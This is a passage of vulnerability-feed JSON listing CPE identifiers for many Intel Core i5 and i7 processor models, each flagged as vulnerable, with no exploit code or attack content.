                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4670k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4670r:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4670s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4670t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4690:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4690k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4690s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4690t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:5200u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:5250u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:5257u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:5287u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:5300u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:5350h:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:5350u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:5575r:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:5675c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:5675r:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6200u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6260u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6267u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6287u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6300hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6300u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6350hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6360u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6400:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6400t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6402p:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6440eq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6440hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6442eq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6500:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6500t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6500te:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6585r:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6600:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6600k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6600t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6685r:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:8250u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:8350u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:8400:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:8600k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7y75:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:610e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:620le:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:620lm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:620m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:620ue:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:620um:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:640lm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:640m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:640um:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:660lm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:660ue:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:660um:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:680um:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:720qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:740qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:820qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:840qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:860:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:860s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:870:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:870s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:875k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:880:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:920:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:920xm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:930:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:940:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:940xm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:950:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:960:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:965:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:970:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:975:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:980:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:980x:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:990x:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2600:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2600k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2600s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2610ue:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2617m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2620m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2629m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2630qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2635qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2637m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2640m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2649m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2655le:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2657m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2670qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2675qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2677m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2700k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2710qe:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2715qe:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2720qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2760qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2820qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2860qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2920xm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2960xm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3517u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3517ue:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3520m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3537u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3540m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3555le:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3610qe:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3610qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3612qe:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3612qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3615qe:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3615qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3630qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3632qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3635qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3667u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3687u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3689y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3720qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3740qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3770:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3770k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3770s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3770t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3820qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3840qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4500u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4510u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4550u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4558u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4578u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4600m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4600u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4610m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4610y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4650u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4700ec:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4700eq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4700hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4700mq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4702ec:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4702hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4702mq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4710hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4710mq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4712hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4712mq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4720hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4722hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4750hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4760hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4765t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770r:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770te:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4771:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4785t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4790:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4790k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4790s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4790t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4800mq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4810mq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4850hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4860hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4870hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4900mq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4910mq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4950hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4960hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4980hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5500u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5550u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5557u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5600u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5650u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5700eq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5700hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5750hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5775c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5775r:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5850eq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5850hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5950hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7500u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7560u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7567u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7600u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
